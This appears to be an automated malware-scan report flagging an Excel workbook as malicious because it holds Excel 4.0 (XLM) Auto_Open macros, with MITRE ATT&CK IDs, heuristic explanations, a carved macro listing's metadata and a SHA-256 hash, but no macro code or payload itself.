MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known technique for executing arbitrary commands. The `RUN` and `risky-formula` values suggest the macro is designed to execute external code. This is commonly used to download and execute a second-stage payload, making it a likely component of a phishing attack.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 125387 bytes |

SHA-256: b980e821a2a267bc9f6c44c628b4bee7e63aa0f3199bb43f2575bec65215fdd8
Preview script: first 1,000 lines of the extracted script